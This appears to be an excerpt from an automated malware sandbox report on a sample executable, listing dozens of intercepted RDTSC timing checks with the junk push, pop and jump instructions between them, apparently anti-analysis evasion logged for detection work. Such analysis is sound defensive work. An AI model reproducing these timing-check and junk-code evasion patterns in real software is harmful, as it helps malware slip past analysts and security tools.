Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C52D3B second address: C52D65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC173h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC9D8BCC16Eh 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C52D65 second address: C52D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C55825 second address: C5583B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Dh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5A4A6 second address: C5A4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5A4AA second address: C5A4BE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jne 00007FC9D8BCC166h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5A4BE second address: C5A4CB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC9D915F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5A638 second address: C5A63C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5AC78 second address: C5AC93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D915F4C5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5AC93 second address: C5ACAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC9D8BCC166h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007FC9D8BCC166h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5ACAF second address: C5ACBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FC9D915F4B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F378 second address: C0F393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC9D8BCC173h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5AE28 second address: C5AE2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5AE2C second address: C5AE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5AFAA second address: C5AFBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D915F4BCh 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5B988 second address: C5B98C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5B98C second address: C5B996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5B996 second address: C5B99A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5B99A second address: C5B9A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5B9A0 second address: C5B9BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5F873 second address: C5F879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5EDE5 second address: C5EE0A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FC9D8BCC173h 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007FC9D8BCC166h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5EF83 second address: C5EF98 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 js 00007FC9D915F4B6h 0x00000009 jnc 00007FC9D915F4B6h 0x0000000f pop esi 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5F0B9 second address: C5F0E6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC9D8BCC187h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5F0E6 second address: C5F0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5F3F8 second address: C5F3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5F3FC second address: C5F410 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FC9D915F4B6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5F410 second address: C5F414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5F414 second address: C5F426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FC9D915F4BEh 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5F426 second address: C5F42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C63284 second address: C63288 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C63288 second address: C63298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007FC9D8BCC178h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62B51 second address: C62B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC9D915F4C2h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62B6D second address: C62B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62B71 second address: C62B75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62CD6 second address: C62CFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FC9D8BCC184h 0x0000000c jmp 00007FC9D8BCC178h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62CFC second address: C62D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jne 00007FC9D915F4B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62D0C second address: C62D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62D12 second address: C62D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC9D915F4B6h 0x0000000a popad 0x0000000b jmp 00007FC9D915F4C5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62D32 second address: C62D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D8BCC16Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C62D43 second address: C62D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C69FE2 second address: C69FE9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C69FE9 second address: C69FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C67FA9 second address: C67FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C67FAE second address: C67FB8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC9D915F4C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C67FB8 second address: C67FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C67FBE second address: C67FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FC9D915F4BCh 0x0000000d ja 00007FC9D915F4B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68283 second address: C6829F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FC9D8BCC166h 0x00000009 jmp 00007FC9D8BCC171h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C685B4 second address: C685BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FC9D915F4B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68B43 second address: C68B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68B48 second address: C68B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BBh 0x00000007 pushad 0x00000008 je 00007FC9D915F4B6h 0x0000000e jmp 00007FC9D915F4BEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68B6C second address: C68B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC9D8BCC177h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68B8C second address: C68B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68B92 second address: C68BA6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jnc 00007FC9D8BCC166h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68E45 second address: C68E55 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC9D915F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68E55 second address: C68E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C68E5B second address: C68E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C693A3 second address: C693A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C693A8 second address: C693CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC9D915F4C2h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007FC9D915F4B8h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C693CC second address: C693D8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC9D8BCC16Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C6E9AF second address: C6E9B4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C6E9B4 second address: C6E9CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D8BCC16Ch 0x00000009 pop esi 0x0000000a jo 00007FC9D8BCC16Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C6DD29 second address: C6DD5C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC9D915F4D5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FC9D915F4C4h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C6DD5C second address: C6DD60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C6E69F second address: C6E6A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C72EB5 second address: C72EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C72EB9 second address: C72ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC9D915F4B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FC9D915F4BCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C72ECD second address: C72EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC9D8BCC16Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C72EE2 second address: C72EEC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC9D915F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C72EEC second address: C72EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C79F41 second address: C79F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jp 00007FC9D915F4BAh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 push edi 0x00000013 jmp 00007FC9D915F4C8h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C7A246 second address: C7A24C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C7A675 second address: C7A67F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC9D915F4C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C7A67F second address: C7A685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C7A685 second address: C7A6BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jg 00007FC9D915F4B6h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FC9D915F4C2h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC9D915F4C1h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C853B9 second address: C853C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC9D8BCC166h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C853C4 second address: C853E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D915F4C8h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C853E2 second address: C853F2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C8F125 second address: C8F12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C8F12F second address: C8F13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC9D8BCC166h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C8F13A second address: C8F164 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC9D915F4D4h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C92BCA second address: C92BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C928EA second address: C928F4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC9D915F4C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C9C83D second address: C9C845 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C9C845 second address: C9C850 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FC9D915F4B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C9C850 second address: C9C859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C9C859 second address: C9C86F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC9D915F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007FC9D915F4D2h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C9C86F second address: C9C87B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C9C87B second address: C9C87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA4C2C second address: CA4C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA4C32 second address: CA4C59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FC9D915F4CFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA4C59 second address: CA4C60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA4A42 second address: CA4A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA4A48 second address: CA4A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D8BCC173h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA4A60 second address: CA4A65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA4A65 second address: CA4AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FC9D8BCC16Dh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f je 00007FC9D8BCC166h 0x00000015 push eax 0x00000016 pop eax 0x00000017 jns 00007FC9D8BCC166h 0x0000001d jmp 00007FC9D8BCC176h 0x00000022 popad 0x00000023 jmp 00007FC9D8BCC16Fh 0x00000028 rdtsc
